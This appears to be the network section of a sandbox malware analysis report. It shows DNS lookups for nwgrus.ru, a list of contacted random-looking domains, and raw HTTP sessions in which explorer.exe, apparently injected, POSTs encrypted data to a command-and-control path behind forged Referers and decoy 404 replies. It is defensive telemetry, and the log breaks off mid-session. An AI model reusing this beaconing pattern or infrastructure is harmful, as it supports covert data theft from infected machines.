                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru181.128.22.240A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.233.78.169A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru181.128.22.240A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.233.78.169A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru181.128.22.240A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.233.78.169A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:28:26.650834084 CEST1.1.1.1192.168.2.50xcd36No error (0)calvinandhalls.com23.145.40.162A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru62.150.232.50A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru189.165.155.245A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST1.1.1.1192.168.2.50x217eNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                                                          • 23.145.40.164
                                                                                          • https:
                                                                                            • calvinandhalls.com
                                                                                          • dwgdbsxrjnnesjc.org
                                                                                            • nwgrus.ru
                                                                                          • jdfqkdrqtsch.com
                                                                                          • yjbjsjjdituglvfr.net
                                                                                          • ifilpxcdnwgbgge.org
                                                                                          • ciwodbbyumgi.org
                                                                                          • uctglujhyyn.com
                                                                                          • semcigauupb.net
                                                                                          • mjkmetahcah.com
                                                                                          • fkvpkdvartxwe.org
                                                                                          • hqcqhgjcmtgx.com
                                                                                          • uwtleoojxrcvopte.net
                                                                                          • puvaafsthshrcum.org
                                                                                          • dvyvdbiqyxa.org
                                                                                          • vjfbbnssutajqo.com
                                                                                          • icltdtwcxuda.org
                                                                                          • hxmpwtofksapy.com
                                                                                          • prhupsyenaon.com
                                                                                          • pjcbyveqviwch.org
                                                                                          • uppdgnyegjvory.com
                                                                                          • ldpymxrfawi.net
                                                                                          • ucebrpsptgm.com
                                                                                          • wvyisbukobdqdei.org
                                                                                          • kymcsuriadoaei.org
                                                                                          • wypsmdkfdcadpn.net
                                                                                          • erjyaeignxsu.com
                                                                                          • mcjitqwtqilsk.com
                                                                                          • cweiuociftg.net
                                                                                          • ncmvgkvwguax.org
                                                                                          • trelswnfdtmn.org
                                                                                          • mltvlrabpgii.net
                                                                                          • wfqqxnqsmcop.net
                                                                                          • gottjuiosjatm.org
                                                                                          • sgntleolvdwaddkp.com
                                                                                          • jevspcjflxdrnyqd.com
                                                                                          • xvjdoetwalpqj.net
                                                                                          • rsomhlsnqixrhe.org
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.549755190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:24.957062960 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://dwgdbsxrjnnesjc.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 286
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:24.957086086 CEST286OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 59 df ad
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA .[k,vupYUTh}[m_xU{h{!8T'KYE]x/P3M.I_'N_Jm4yQY]Z!CJyZktZDUc)V<9
                                                                                          Oct 3, 2024 23:27:26.349044085 CEST152INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:26 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 04 00 00 00 72 e8 86 ea
                                                                                          Data Ascii: r


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.549765190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:26.370758057 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://jdfqkdrqtsch.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 324
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:26.370771885 CEST324OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 6e 49 da 85
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vunIX)YQmH+}J<jn[{m(Y[I],:RR-:(iY4Mw6!G;E %D(Zx{#`C+8T)i
                                                                                          Oct 3, 2024 23:27:27.757612944 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:27 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.549776190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:27.767014027 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://yjbjsjjdituglvfr.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 268
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:27.767029047 CEST268OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5e 57 e5 b9
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu^W_dpFWL[wp]L\2(m?D:;,B,W<B?yC7RAC&#(V2${pIYvig{k SWi
                                                                                          Oct 3, 2024 23:27:29.193905115 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:28 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.549787190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:29.202608109 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://ifilpxcdnwgbgge.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 117
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:29.202635050 CEST117OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 45 01 a6 e1
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuE>TOlSkZw;|jFq
                                                                                          Oct 3, 2024 23:27:30.542697906 CEST137INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:30 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.549798190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:30.551434994 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://ciwodbbyumgi.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 300
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:30.551450014 CEST300OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 5e 39 df 85
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu^9r[\a\U'wiJUOvPD?PMV=.3\vnOW7Xm9`&_UHLh&jE=[Qw6{=Kz
                                                                                          Oct 3, 2024 23:27:31.904184103 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:31 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.549807190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:31.912558079 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://uctglujhyyn.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 177
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:31.912573099 CEST177OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 74 14 ef 9c
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vut<i7C"{*8]ktcc[6,2RB$mSPSw0s\e-
                                                                                          Oct 3, 2024 23:27:33.285248995 CEST137INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:33 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.549815190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:33.294157982 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://semcigauupb.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 145
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:33.294157982 CEST145OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 21 32 be ae
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu!2^;BtXTX>X/CLu:T;1<d!N#
                                                                                          Oct 3, 2024 23:27:34.674696922 CEST137INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:34 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.549826190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:34.684005022 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://mjkmetahcah.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 211
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:34.684005022 CEST211OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 55 4f df b5
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuUObD_vh".?3]kt]LSVNB/FSGvWTDh=CCN7-J!R>o_%Yr
                                                                                          Oct 3, 2024 23:27:36.197139025 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:35 GMT
